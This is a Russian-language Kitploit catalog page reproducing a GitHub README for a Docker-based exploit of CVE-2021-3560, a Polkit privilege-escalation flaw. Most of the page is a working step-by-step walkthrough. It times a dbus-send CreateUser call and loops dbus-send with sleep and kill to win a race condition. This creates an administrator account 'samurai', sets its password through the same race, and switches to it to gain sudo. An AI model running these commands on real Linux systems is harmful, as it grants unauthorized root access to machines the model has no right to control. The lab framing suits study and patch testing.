Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation — Эксплойт на основе Docker для CVE-2021-3560 (повышение привилегий Polkit) с пошаговыми инструкциями по созданию пользователя sudo через состояние гонки в dbus-send. | Kitploit
Инструменты/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

Эксплойт на основе Docker для CVE-2021-3560 (повышение привилегий Polkit) с пошаговыми инструкциями по созданию пользователя sudo через состояние гонки в dbus-send.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

CVE-2021-3560-Polkit-Privilege-Escalation

by Mark, Qingchen Yu Для сборки контейнера с помощью

root@kitploit:~
docker build -t <image tag of your choice> .

Для запуска контейнера

root@kitploit:~
docker run -it <image tag name>
  1. начните с start.sh

  2. Измерьте время выполнения: Запомните время 'real' и вычислите его половину.

    root@kitploit:~
    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. Создайте пользователя с привилегиями sudo: Замените X.XXX на половину времени 'real' из предыдущего шага, так как мы хотим прервать процесс в середине. Команда будет выполняться в цикле 10000 раз. Возможно, потребуется запустить этот шаг несколько раз.

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. Проверьте создание пользователя id samurai Должна отобразиться информация, что пользователь samurai существует, и его права. Если нет, повторите шаг 2.

  5. Сгенерируйте хэш пароля: в данном случае пароль будет 'iamsamurai' Запомните сгенерированный хэш.

    root@kitploit:~
    openssl passwd -5 iamsamurai
    
  6. Установите пароль для нового пользователя: Замените X.XXX на длительность паузы, а Password Hash на хэш из шага 4. Замените UUUU на ID пользователя 'samurai'

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. Переключитесь на нового пользователя с паролем, созданным в шаге 4. su - samurai

    Теперь вы должны иметь возможность использовать 'sudo' от имени этого пользователя.

Скачать инструмент